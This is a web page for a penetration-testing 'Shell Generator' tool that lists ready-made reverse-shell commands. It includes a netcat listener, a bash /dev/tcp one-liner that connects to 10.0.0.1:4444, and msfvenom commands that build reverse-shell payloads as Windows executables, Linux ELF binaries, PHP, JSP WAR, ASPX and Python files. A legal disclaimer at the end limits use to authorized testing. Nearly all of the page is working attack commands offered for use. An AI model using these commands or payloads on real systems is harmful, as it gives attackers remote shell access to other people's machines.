pentest tools/payloads/Shell Generator
Shell Generator
Generate reverse shell commands and payloads for penetration testing
pentest tools
Risk: High
Reverse Shells
Bind Shells
MSFVenom Payloads
Listener Commands
#reverse shell
#bind shell
#metasploit
#payloads
#netcat
#msfvenom
Listener Configuration
Listener Command
$
nc -lnvp 4444
Reverse Shell Commands
Bash #1
Bash #2
Perl
Python
PHP
PowerShell
Ruby
Netcat
Java
$
bash -i >& /dev/tcp/10.0.0.1/4444 0>&1
MSFVenom Payloads
Windows EXE
msfvenom -p windows/shell_reverse_tcp LHOST=10.0.0.1 LPORT=4444 -f exe > shell_4444.exe
Linux ELF
msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.0.0.1 LPORT=4444 -f elf > shell_4444.elf
PHP
msfvenom -p php/reverse_php LHOST=10.0.0.1 LPORT=4444 -f raw > shell_4444.php
Java WAR
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.0.0.1 LPORT=4444 -f war > shell_4444.war
ASPX
msfvenom -p windows/shell_reverse_tcp LHOST=10.0.0.1 LPORT=4444 -f aspx > shell_4444.aspx
Python
msfvenom -p cmd/unix/reverse_python LHOST=10.0.0.1 LPORT=4444 -f raw > shell_4444.py
Legal Disclaimer
This tool is intended for educational and authorized security testing purposes only. Use it only on systems you own or on systems where you have explicit, documented permission to perform security assessments. Unauthorized use of this tool against systems you do not own or manage is strictly prohibited and may be illegal. Always act responsibly and within the bounds of all applicable laws and ethical guidelines.
Authorization Required
Only use this tool on systems you own or have explicit written permission to test. Unauthorized scanning or testing is illegal and may result in criminal charges.